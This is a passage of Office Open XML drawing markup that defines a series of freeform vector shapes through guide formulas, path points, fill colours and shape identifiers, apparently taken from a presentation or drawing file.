                  <a:gd name="T28" fmla="*/ 17 w 59"/>
                  <a:gd name="T29" fmla="*/ 27 h 52"/>
                  <a:gd name="T30" fmla="*/ 24 w 59"/>
                  <a:gd name="T31" fmla="*/ 27 h 52"/>
                  <a:gd name="T32" fmla="*/ 38 w 59"/>
                  <a:gd name="T33" fmla="*/ 27 h 52"/>
                  <a:gd name="T34" fmla="*/ 33 w 59"/>
                  <a:gd name="T35" fmla="*/ 28 h 52"/>
                  <a:gd name="T36" fmla="*/ 44 w 59"/>
                  <a:gd name="T37" fmla="*/ 28 h 52"/>
                  <a:gd name="T38" fmla="*/ 39 w 59"/>
                  <a:gd name="T39" fmla="*/ 32 h 52"/>
                  <a:gd name="T40" fmla="*/ 40 w 59"/>
                  <a:gd name="T41" fmla="*/ 34 h 52"/>
                  <a:gd name="T42" fmla="*/ 38 w 59"/>
                  <a:gd name="T43" fmla="*/ 36 h 52"/>
                  <a:gd name="T44" fmla="*/ 39 w 59"/>
                  <a:gd name="T45" fmla="*/ 38 h 52"/>
                  <a:gd name="T46" fmla="*/ 34 w 59"/>
                  <a:gd name="T47" fmla="*/ 41 h 52"/>
                  <a:gd name="T48" fmla="*/ 40 w 59"/>
                  <a:gd name="T49" fmla="*/ 43 h 52"/>
                  <a:gd name="T50" fmla="*/ 43 w 59"/>
                  <a:gd name="T51" fmla="*/ 42 h 52"/>
                  <a:gd name="T52" fmla="*/ 40 w 59"/>
                  <a:gd name="T53" fmla="*/ 49 h 52"/>
                  <a:gd name="T54" fmla="*/ 49 w 59"/>
                  <a:gd name="T55" fmla="*/ 40 h 52"/>
                  <a:gd name="T56" fmla="*/ 42 w 59"/>
                  <a:gd name="T57" fmla="*/ 50 h 52"/>
                  <a:gd name="T58" fmla="*/ 53 w 59"/>
                  <a:gd name="T59" fmla="*/ 41 h 52"/>
                  <a:gd name="T60" fmla="*/ 57 w 59"/>
                  <a:gd name="T61" fmla="*/ 26 h 52"/>
                  <a:gd name="T62" fmla="*/ 48 w 59"/>
                  <a:gd name="T63" fmla="*/ 22 h 52"/>
                  <a:gd name="T64" fmla="*/ 49 w 59"/>
                  <a:gd name="T65" fmla="*/ 19 h 52"/>
                  <a:gd name="T66" fmla="*/ 58 w 59"/>
                  <a:gd name="T67" fmla="*/ 15 h 52"/>
                  <a:gd name="T68" fmla="*/ 45 w 59"/>
                  <a:gd name="T69" fmla="*/ 12 h 52"/>
                  <a:gd name="T70" fmla="*/ 51 w 59"/>
                  <a:gd name="T71" fmla="*/ 10 h 52"/>
                  <a:gd name="T72" fmla="*/ 53 w 59"/>
                  <a:gd name="T73" fmla="*/ 3 h 52"/>
                  <a:gd name="T74" fmla="*/ 39 w 59"/>
                  <a:gd name="T75" fmla="*/ 5 h 52"/>
                  <a:gd name="T76" fmla="*/ 41 w 59"/>
                  <a:gd name="T77" fmla="*/ 0 h 52"/>
                  <a:gd name="T78" fmla="*/ 29 w 59"/>
                  <a:gd name="T79" fmla="*/ 3 h 52"/>
                  <a:gd name="T80" fmla="*/ 29 w 59"/>
                  <a:gd name="T81" fmla="*/ 0 h 52"/>
                  <a:gd name="T82" fmla="*/ 20 w 59"/>
                  <a:gd name="T83" fmla="*/ 0 h 52"/>
                  <a:gd name="T84" fmla="*/ 12 w 59"/>
                  <a:gd name="T85" fmla="*/ 7 h 52"/>
                  <a:gd name="T86" fmla="*/ 9 w 59"/>
                  <a:gd name="T87" fmla="*/ 3 h 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9"/>
                  <a:gd name="T133" fmla="*/ 0 h 52"/>
                  <a:gd name="T134" fmla="*/ 59 w 59"/>
                  <a:gd name="T135" fmla="*/ 52 h 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9" h="52">
                    <a:moveTo>
                      <a:pt x="9" y="3"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="5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9" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="11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24" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="11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20" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="13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26" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="18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24" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="23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5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8" y="26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0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="27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8" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="43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44" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47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4" y="5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7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="3"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A05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5" name="Freeform 263">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85686842-0C1E-446C-BCDF-A1E72A5D1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299"/>
                <a:ext cx="68" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 67 w 68"/>
                  <a:gd name="T1" fmla="*/ 21 h 37"/>
                  <a:gd name="T2" fmla="*/ 58 w 68"/>
                  <a:gd name="T3" fmla="*/ 19 h 37"/>
                  <a:gd name="T4" fmla="*/ 55 w 68"/>
                  <a:gd name="T5" fmla="*/ 18 h 37"/>
                  <a:gd name="T6" fmla="*/ 53 w 68"/>
                  <a:gd name="T7" fmla="*/ 18 h 37"/>
                  <a:gd name="T8" fmla="*/ 51 w 68"/>
                  <a:gd name="T9" fmla="*/ 15 h 37"/>
                  <a:gd name="T10" fmla="*/ 47 w 68"/>
                  <a:gd name="T11" fmla="*/ 12 h 37"/>
                  <a:gd name="T12" fmla="*/ 40 w 68"/>
                  <a:gd name="T13" fmla="*/ 6 h 37"/>
                  <a:gd name="T14" fmla="*/ 39 w 68"/>
                  <a:gd name="T15" fmla="*/ 5 h 37"/>
                  <a:gd name="T16" fmla="*/ 37 w 68"/>
                  <a:gd name="T17" fmla="*/ 3 h 37"/>
                  <a:gd name="T18" fmla="*/ 33 w 68"/>
                  <a:gd name="T19" fmla="*/ 2 h 37"/>
                  <a:gd name="T20" fmla="*/ 21 w 68"/>
                  <a:gd name="T21" fmla="*/ 0 h 37"/>
                  <a:gd name="T22" fmla="*/ 18 w 68"/>
                  <a:gd name="T23" fmla="*/ 0 h 37"/>
                  <a:gd name="T24" fmla="*/ 15 w 68"/>
                  <a:gd name="T25" fmla="*/ 1 h 37"/>
                  <a:gd name="T26" fmla="*/ 14 w 68"/>
                  <a:gd name="T27" fmla="*/ 2 h 37"/>
                  <a:gd name="T28" fmla="*/ 6 w 68"/>
                  <a:gd name="T29" fmla="*/ 4 h 37"/>
                  <a:gd name="T30" fmla="*/ 5 w 68"/>
                  <a:gd name="T31" fmla="*/ 5 h 37"/>
                  <a:gd name="T32" fmla="*/ 4 w 68"/>
                  <a:gd name="T33" fmla="*/ 6 h 37"/>
                  <a:gd name="T34" fmla="*/ 2 w 68"/>
                  <a:gd name="T35" fmla="*/ 9 h 37"/>
                  <a:gd name="T36" fmla="*/ 1 w 68"/>
                  <a:gd name="T37" fmla="*/ 11 h 37"/>
                  <a:gd name="T38" fmla="*/ 0 w 68"/>
                  <a:gd name="T39" fmla="*/ 12 h 37"/>
                  <a:gd name="T40" fmla="*/ 0 w 68"/>
                  <a:gd name="T41" fmla="*/ 14 h 37"/>
                  <a:gd name="T42" fmla="*/ 0 w 68"/>
                  <a:gd name="T43" fmla="*/ 15 h 37"/>
                  <a:gd name="T44" fmla="*/ 1 w 68"/>
                  <a:gd name="T45" fmla="*/ 16 h 37"/>
                  <a:gd name="T46" fmla="*/ 4 w 68"/>
                  <a:gd name="T47" fmla="*/ 16 h 37"/>
                  <a:gd name="T48" fmla="*/ 8 w 68"/>
                  <a:gd name="T49" fmla="*/ 14 h 37"/>
                  <a:gd name="T50" fmla="*/ 14 w 68"/>
                  <a:gd name="T51" fmla="*/ 13 h 37"/>
                  <a:gd name="T52" fmla="*/ 19 w 68"/>
                  <a:gd name="T53" fmla="*/ 14 h 37"/>
                  <a:gd name="T54" fmla="*/ 14 w 68"/>
                  <a:gd name="T55" fmla="*/ 15 h 37"/>
                  <a:gd name="T56" fmla="*/ 10 w 68"/>
                  <a:gd name="T57" fmla="*/ 16 h 37"/>
                  <a:gd name="T58" fmla="*/ 6 w 68"/>
                  <a:gd name="T59" fmla="*/ 18 h 37"/>
                  <a:gd name="T60" fmla="*/ 5 w 68"/>
                  <a:gd name="T61" fmla="*/ 18 h 37"/>
                  <a:gd name="T62" fmla="*/ 5 w 68"/>
                  <a:gd name="T63" fmla="*/ 20 h 37"/>
                  <a:gd name="T64" fmla="*/ 6 w 68"/>
                  <a:gd name="T65" fmla="*/ 21 h 37"/>
                  <a:gd name="T66" fmla="*/ 8 w 68"/>
                  <a:gd name="T67" fmla="*/ 20 h 37"/>
                  <a:gd name="T68" fmla="*/ 15 w 68"/>
                  <a:gd name="T69" fmla="*/ 19 h 37"/>
                  <a:gd name="T70" fmla="*/ 20 w 68"/>
                  <a:gd name="T71" fmla="*/ 19 h 37"/>
                  <a:gd name="T72" fmla="*/ 23 w 68"/>
                  <a:gd name="T73" fmla="*/ 19 h 37"/>
                  <a:gd name="T74" fmla="*/ 26 w 68"/>
                  <a:gd name="T75" fmla="*/ 20 h 37"/>
                  <a:gd name="T76" fmla="*/ 28 w 68"/>
                  <a:gd name="T77" fmla="*/ 23 h 37"/>
                  <a:gd name="T78" fmla="*/ 30 w 68"/>
                  <a:gd name="T79" fmla="*/ 26 h 37"/>
                  <a:gd name="T80" fmla="*/ 33 w 68"/>
                  <a:gd name="T81" fmla="*/ 29 h 37"/>
                  <a:gd name="T82" fmla="*/ 35 w 68"/>
                  <a:gd name="T83" fmla="*/ 31 h 37"/>
                  <a:gd name="T84" fmla="*/ 38 w 68"/>
                  <a:gd name="T85" fmla="*/ 33 h 37"/>
                  <a:gd name="T86" fmla="*/ 40 w 68"/>
                  <a:gd name="T87" fmla="*/ 33 h 37"/>
                  <a:gd name="T88" fmla="*/ 44 w 68"/>
                  <a:gd name="T89" fmla="*/ 33 h 37"/>
                  <a:gd name="T90" fmla="*/ 48 w 68"/>
                  <a:gd name="T91" fmla="*/ 33 h 37"/>
                  <a:gd name="T92" fmla="*/ 51 w 68"/>
                  <a:gd name="T93" fmla="*/ 33 h 37"/>
                  <a:gd name="T94" fmla="*/ 56 w 68"/>
                  <a:gd name="T95" fmla="*/ 34 h 37"/>
                  <a:gd name="T96" fmla="*/ 67 w 68"/>
                  <a:gd name="T97" fmla="*/ 36 h 37"/>
                  <a:gd name="T98" fmla="*/ 67 w 68"/>
                  <a:gd name="T99" fmla="*/ 21 h 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8"/>
                  <a:gd name="T151" fmla="*/ 0 h 37"/>
                  <a:gd name="T152" fmla="*/ 68 w 68"/>
                  <a:gd name="T153" fmla="*/ 37 h 3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8" h="37">
                    <a:moveTo>
                      <a:pt x="67" y="21"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="58" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33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1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4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="14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5" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="19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8" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="21"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFC080"/>
              </a:solidFill>
              <a:ln w="12700" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="402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6" name="Freeform 264">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64131B33-6C92-440B-B519-BCD2149C3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0" y="2306"/>
                <a:ext cx="20" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 20"/>
                  <a:gd name="T1" fmla="*/ 16 h 17"/>
                  <a:gd name="T2" fmla="*/ 3 w 20"/>
                  <a:gd name="T3" fmla="*/ 8 h 17"/>
                  <a:gd name="T4" fmla="*/ 5 w 20"/>
                  <a:gd name="T5" fmla="*/ 8 h 17"/>
                  <a:gd name="T6" fmla="*/ 10 w 20"/>
                  <a:gd name="T7" fmla="*/ 8 h 17"/>
                  <a:gd name="T8" fmla="*/ 11 w 20"/>
                  <a:gd name="T9" fmla="*/ 0 h 17"/>
                  <a:gd name="T10" fmla="*/ 15 w 20"/>
                  <a:gd name="T11" fmla="*/ 8 h 17"/>
                  <a:gd name="T12" fmla="*/ 19 w 20"/>
                  <a:gd name="T13" fmla="*/ 8 h 17"/>
                  <a:gd name="T14" fmla="*/ 14 w 20"/>
                  <a:gd name="T15" fmla="*/ 0 h 17"/>
                  <a:gd name="T16" fmla="*/ 10 w 20"/>
                  <a:gd name="T17" fmla="*/ 0 h 17"/>
                  <a:gd name="T18" fmla="*/ 5 w 20"/>
                  <a:gd name="T19" fmla="*/ 8 h 17"/>
                  <a:gd name="T20" fmla="*/ 3 w 20"/>
                  <a:gd name="T21" fmla="*/ 8 h 17"/>
                  <a:gd name="T22" fmla="*/ 0 w 20"/>
                  <a:gd name="T23" fmla="*/ 16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7"/>
                  <a:gd name="T38" fmla="*/ 20 w 20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7">
                    <a:moveTo>
                      <a:pt x="0" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="8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7" name="Freeform 265">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2FE39C4-5621-4AD9-B183-923C7100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2301"/>
                <a:ext cx="17" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 17"/>
                  <a:gd name="T1" fmla="*/ 0 h 17"/>
                  <a:gd name="T2" fmla="*/ 2 w 17"/>
                  <a:gd name="T3" fmla="*/ 0 h 17"/>
                  <a:gd name="T4" fmla="*/ 0 w 17"/>
                  <a:gd name="T5" fmla="*/ 0 h 17"/>
                  <a:gd name="T6" fmla="*/ 1 w 17"/>
                  <a:gd name="T7" fmla="*/ 0 h 17"/>
                  <a:gd name="T8" fmla="*/ 4 w 17"/>
                  <a:gd name="T9" fmla="*/ 0 h 17"/>
                  <a:gd name="T10" fmla="*/ 8 w 17"/>
                  <a:gd name="T11" fmla="*/ 16 h 17"/>
                  <a:gd name="T12" fmla="*/ 11 w 17"/>
                  <a:gd name="T13" fmla="*/ 16 h 17"/>
                  <a:gd name="T14" fmla="*/ 14 w 17"/>
                  <a:gd name="T15" fmla="*/ 16 h 17"/>
                  <a:gd name="T16" fmla="*/ 16 w 17"/>
                  <a:gd name="T17" fmla="*/ 16 h 17"/>
                  <a:gd name="T18" fmla="*/ 11 w 17"/>
                  <a:gd name="T19" fmla="*/ 16 h 17"/>
                  <a:gd name="T20" fmla="*/ 8 w 17"/>
                  <a:gd name="T21" fmla="*/ 0 h 17"/>
                  <a:gd name="T22" fmla="*/ 4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1" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0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8" name="Freeform 266">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34D0E5F8-ECAE-4871-A4DA-07C952B67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" y="231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3 w 17"/>
                  <a:gd name="T3" fmla="*/ 16 h 17"/>
                  <a:gd name="T4" fmla="*/ 6 w 17"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 11 w 17"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 16 w 17"/>
                  <a:gd name="T9" fmla="*/ 0 h 17"/>
                  <a:gd name="T10" fmla="*/ 11 w 17"/>
                  <a:gd name="T11" fmla="*/ 0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3" y="16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49" name="Freeform 267">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38CB7B67-8F9F-4732-AD2E-9680B54BA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8" y="2311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6 w 1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"/>
                  <a:gd name="T11" fmla="*/ 17 w 1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0" name="Freeform 268">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81D0EE63-9D3B-4DBD-BD2B-61B208C8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317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9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1" name="Freeform 269">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2644B628-98E3-4AC7-A812-D4B6AB98F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309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"/>
                  <a:gd name="T11" fmla="*/ 17 w 1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2" name="Freeform 270">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ECA9FFD-DB00-48B6-ABE7-02625F103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" y="230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2 w 17"/>
                  <a:gd name="T3" fmla="*/ 4 h 17"/>
                  <a:gd name="T4" fmla="*/ 5 w 17"/>
                  <a:gd name="T5" fmla="*/ 8 h 17"/>
                  <a:gd name="T6" fmla="*/ 16 w 17"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 5 w 17"/>
                  <a:gd name="T9" fmla="*/ 7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2" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5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3" name="Freeform 271">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CBF6818-0CAF-4694-8857-6D894A406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" y="232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4 h 17"/>
                  <a:gd name="T4" fmla="*/ 0 w 17"/>
                  <a:gd name="T5" fmla="*/ 11 h 17"/>
                  <a:gd name="T6" fmla="*/ 0 w 17"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 0 w 17"/>
                  <a:gd name="T9" fmla="*/ 8 h 17"/>
                  <a:gd name="T10" fmla="*/ 0 w 17"/>
                  <a:gd name="T11" fmla="*/ 4 h 17"/>
                  <a:gd name="T12" fmla="*/ 16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4" name="Freeform 272">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D1F58BD-CE8C-4F49-B7C7-4F014A0B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315"/>
                <a:ext cx="17" cy="1"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 11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11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1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5" name="Freeform 273">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{541451E0-EE02-4DF2-8A2C-4FC0E633C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223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4 w 17"/>
                  <a:gd name="T3" fmla="*/ 0 h 1"/>
                  <a:gd name="T4" fmla="*/ 10 w 17"/>
                  <a:gd name="T5" fmla="*/ 0 h 1"/>
                  <a:gd name="T6" fmla="*/ 16 w 17"/>
                  <a:gd name="T7" fmla="*/ 0 h 1"/>
                  <a:gd name="T8" fmla="*/ 10 w 17"/>
                  <a:gd name="T9" fmla="*/ 0 h 1"/>
                  <a:gd name="T10" fmla="*/ 4 w 17"/>
                  <a:gd name="T11" fmla="*/ 0 h 1"/>
                  <a:gd name="T12" fmla="*/ 0 w 17"/>
                  <a:gd name="T13" fmla="*/ 0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"/>
                  <a:gd name="T23" fmla="*/ 17 w 17"/>
                  <a:gd name="T24" fmla="*/ 1 h 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6" name="Freeform 274">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EC7A47F-CCB7-44CB-9FFC-25DBAEA2B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22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7" name="Freeform 275">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B382ED-3484-4570-983C-9950D1CF7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" y="2242"/>
                <a:ext cx="40" cy="90"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 33 w 40"/>
                  <a:gd name="T1" fmla="*/ 0 h 90"/>
                  <a:gd name="T2" fmla="*/ 29 w 40"/>
                  <a:gd name="T3" fmla="*/ 3 h 90"/>
                  <a:gd name="T4" fmla="*/ 28 w 40"/>
                  <a:gd name="T5" fmla="*/ 8 h 90"/>
                  <a:gd name="T6" fmla="*/ 23 w 40"/>
                  <a:gd name="T7" fmla="*/ 14 h 90"/>
                  <a:gd name="T8" fmla="*/ 11 w 40"/>
                  <a:gd name="T9" fmla="*/ 38 h 90"/>
                  <a:gd name="T10" fmla="*/ 5 w 40"/>
                  <a:gd name="T11" fmla="*/ 60 h 90"/>
                  <a:gd name="T12" fmla="*/ 0 w 40"/>
                  <a:gd name="T13" fmla="*/ 89 h 90"/>
                  <a:gd name="T14" fmla="*/ 15 w 40"/>
                  <a:gd name="T15" fmla="*/ 76 h 90"/>
